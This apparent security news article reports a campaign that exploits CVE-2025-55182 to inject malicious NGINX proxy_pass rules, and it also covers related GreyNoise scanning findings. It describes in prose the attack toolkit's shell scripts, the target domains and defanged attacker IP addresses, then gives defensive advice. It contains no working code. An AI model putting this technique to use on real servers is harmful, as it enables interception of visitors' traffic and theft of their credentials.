Researchers have uncovered a large-scale web traffic hijacking campaign that abuses malicious NGINX configurations to secretly intercept and redirect legitimate website traffic. The campaign mainly targets NGINX servers and popular server management tools like the Baota (BT) Panel, allowing attackers to route web traffic through infrastructure they control.
According to findings from Datadog Security Labs, the attack activity is linked to the exploitation of React2Shell (CVE-2025-55182), a critical vulnerability with a CVSS score of 10.0. This flaw enables attackers to gain remote access and then manipulate NGINX settings to hijack traffic without raising immediate alarms.
NGINX is widely used as a reverse proxy and load balancer, making it a high-value target for attackers. In this campaign, threat actors inject malicious “location” directives into NGINX configuration files. These directives intercept normal user requests and silently forward them to attacker-controlled backend servers using the proxy_pass instruction.
As a result, users believe they are communicating with a legitimate website, while their traffic is actually passing through malicious infrastructure. This technique allows attackers to monitor, modify, or exploit web sessions, making it extremely dangerous for both website owners and visitors.
Security researcher Ryan Simon explained that the attackers focus heavily on:
Asian top-level domains (TLDs) such as
.in,.id,.pe,.bd, and.thChinese hosting environments, particularly those using the Baota (BT) Panel
Government and education domains, including
.govand.edu
This targeting suggests a strong interest in high-trust websites, which can be leveraged for surveillance, credential theft, or further attacks.
The attack is powered by a multi-stage shell script toolkit designed to discover targets, maintain persistence, and deploy malicious NGINX configurations. Each script has a specific role in ensuring the attack runs smoothly and avoids detection.
Key components of the toolkit include:
zx.sh
Acts as the main controller, executing additional scripts using standard tools likecurlorwget. If these tools are blocked, it falls back to creating raw TCP connections to send HTTP requests manually.bt.sh
Specifically targets the Baota (BT) Panel environment. It overwrites existing NGINX configuration files to inject malicious proxy rules.4zdh.sh
Scans common NGINX configuration directories across systems. It carefully creates new configurations while minimizing syntax errors that could alert administrators.zdh.sh
Focuses on Linux-based and containerized NGINX deployments, with special attention to domains using.inand.idTLDs.ok.sh
Generates a detailed report of all active NGINX traffic hijacking rules, allowing attackers to track successful compromises.
Together, these scripts enable attackers to persistently control traffic flows, even after server restarts or minor configuration changes.
The disclosure also aligns with recent intelligence from GreyNoise, which reported that just two IP addresses — 193.142.147[.]209 and 87.121.84[.]24 — were responsible for 56% of all observed React2Shell exploitation attempts within two months of public disclosure.
Between January 26 and February 2, 2026, researchers observed 1,083 unique IP addresses actively attempting to exploit CVE-2025-55182. This highlights how quickly attackers weaponize newly disclosed vulnerabilities, especially those affecting widely used technologies like React and NGINX.
GreyNoise noted that the main attackers deploy different post-exploitation payloads, revealing varying objectives:
One threat actor downloads cryptomining malware from staging servers to exploit system resources.
Another actor opens reverse shells directly back to scanning IPs, indicating a desire for interactive control rather than automated exploitation.
This behavior suggests that the campaign is not only financially motivated but may also involve espionage or long-term access goals.
In a related development, researchers uncovered a coordinated reconnaissance campaign targeting Citrix ADC Gateway and Netscaler Gateway systems. Attackers used tens of thousands of residential proxy IPs combined with a single Microsoft Azure-hosted IP address (52.139.3[.]76).
According to GreyNoise, the campaign operated in two modes:
Massive distributed scanning using residential proxies to discover exposed login panels.
Concentrated cloud-based scanning focused on identifying software versions.
This dual strategy indicates highly organized reconnaissance, aimed at preparing future exploitation attempts.
This NGINX traffic hijacking campaign is particularly dangerous because it:
Exploits trusted infrastructure
Operates at the configuration level, not just application code
Can remain undetected for long periods
Affects government, education, and high-value domains
Once traffic is hijacked, attackers can steal credentials, inject malware, manipulate content, or spy on sensitive communications.
To reduce risk, organizations should:
Immediately patch systems vulnerable to CVE-2025-55182
Audit NGINX configuration files for unauthorized
proxy_passdirectivesRestrict access to Baota (BT) and other management panels
Monitor outbound traffic for unexpected backend connections
Use file integrity monitoring to detect configuration changes
The discovery of this malicious NGINX configuration campaign highlights how attackers are shifting toward infrastructure-level attacks that bypass traditional security controls. With critical vulnerabilities like React2Shell being actively exploited, organizations must act quickly to secure their web servers and continuously monitor for suspicious configuration changes.
Interesting Article : CVE-2025-40551, SolarWinds Web Help Desk Vulnerability Actively Exploited
Pingback: BeyondTrust CVE-2026-1731 Pre-Auth RCE Flaw in Remote Support and PRA